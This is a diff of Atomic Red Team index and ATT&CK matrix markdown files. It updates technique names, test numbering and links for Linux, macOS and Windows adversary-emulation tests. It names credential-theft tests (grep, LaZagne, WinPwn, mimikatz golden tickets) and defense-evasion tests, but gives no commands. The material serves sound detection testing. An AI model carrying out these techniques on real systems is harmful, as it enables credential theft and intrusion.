- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #2: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #3: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #6: Find and Access Github Credentials [macos, linux]
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -525,7 +531,7 @@
|
||||
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
|
||||
- Atomic Test #13: Remote System Discovery - ip route [linux]
|
||||
- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
|
||||
- [T1046 Network Service Scanning](../../T1046/T1046.md)
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #1: Port Scan [linux, macos]
|
||||
- Atomic Test #2: Port Scan Nmap [linux, macos]
|
||||
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -80,7 +80,8 @@
|
||||
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
|
||||
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
|
||||
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [macos, linux]
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
|
||||
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
|
||||
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -256,7 +257,8 @@
|
||||
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
|
||||
- Atomic Test #1: Launch Daemon [macos]
|
||||
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
|
||||
- Atomic Test #1: Trap EXIT [macos, linux]
|
||||
- Atomic Test #2: Trap SIGINT [macos, linux]
|
||||
@@ -345,7 +347,8 @@
|
||||
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
|
||||
- Atomic Test #1: Launch Daemon [macos]
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
|
||||
- Atomic Test #1: Trap EXIT [macos, linux]
|
||||
- Atomic Test #2: Trap SIGINT [macos, linux]
|
||||
@@ -437,9 +440,10 @@
|
||||
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #2: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #3: Extract passwords with grep [macos, linux]
|
||||
- Atomic Test #6: Find and Access Github Credentials [macos, linux]
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -517,7 +521,7 @@
|
||||
- [T1018 Remote System Discovery](../../T1018/T1018.md)
|
||||
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
|
||||
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
|
||||
- [T1046 Network Service Scanning](../../T1046/T1046.md)
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #1: Port Scan [linux, macos]
|
||||
- Atomic Test #2: Port Scan Nmap [linux, macos]
|
||||
- [T1518 Software Discovery](../../T1518/T1518.md)
|
||||
@@ -670,7 +674,8 @@
|
||||
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
|
||||
- Atomic Test #3: Enable Guest Account on macOS [macos]
|
||||
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -370,6 +370,7 @@
|
||||
- Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
|
||||
- Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
|
||||
- Atomic Test #38: Delete Windows Defender Scheduled Tasks [windows]
|
||||
- Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1308,14 +1309,14 @@
|
||||
- Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
|
||||
- Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #3: Extracting passwords with findstr [windows]
|
||||
- Atomic Test #4: Access unattend.xml [windows]
|
||||
- Atomic Test #6: WinPwn - sensitivefiles [windows]
|
||||
- Atomic Test #7: WinPwn - Snaffler [windows]
|
||||
- Atomic Test #8: WinPwn - powershellsensitive [windows]
|
||||
- Atomic Test #9: WinPwn - passhunt [windows]
|
||||
- Atomic Test #10: WinPwn - SessionGopher [windows]
|
||||
- Atomic Test #11: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
|
||||
- Atomic Test #4: Extracting passwords with findstr [windows]
|
||||
- Atomic Test #5: Access unattend.xml [windows]
|
||||
- Atomic Test #7: WinPwn - sensitivefiles [windows]
|
||||
- Atomic Test #8: WinPwn - Snaffler [windows]
|
||||
- Atomic Test #9: WinPwn - powershellsensitive [windows]
|
||||
- Atomic Test #10: WinPwn - passhunt [windows]
|
||||
- Atomic Test #11: WinPwn - SessionGopher [windows]
|
||||
- Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
|
||||
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
|
||||
- Atomic Test #1: GPP Passwords (findstr) [windows]
|
||||
@@ -1544,7 +1545,7 @@
|
||||
- Atomic Test #18: Get-DomainController with PowerView [windows]
|
||||
- Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
|
||||
- Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
|
||||
- [T1046 Network Service Scanning](../../T1046/T1046.md)
|
||||
- [T1046 Network Service Discovery](../../T1046/T1046.md)
|
||||
- Atomic Test #3: Port Scan NMap for Windows [windows]
|
||||
- Atomic Test #4: Port Scan using python [windows]
|
||||
- Atomic Test #5: WinPwn - spoolvulnscan [windows]
|
||||
|
||||
@@ -29,7 +29,7 @@
|
||||
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
|
||||
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Non-Standard Port](../../T1571/T1571.md) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
|
||||
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
|
||||
@@ -9,20 +9,20 @@
|
||||
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | [Network Sniffing](../../T1040/T1040.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Unsecured Credentials](../../T1552/T1552.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A 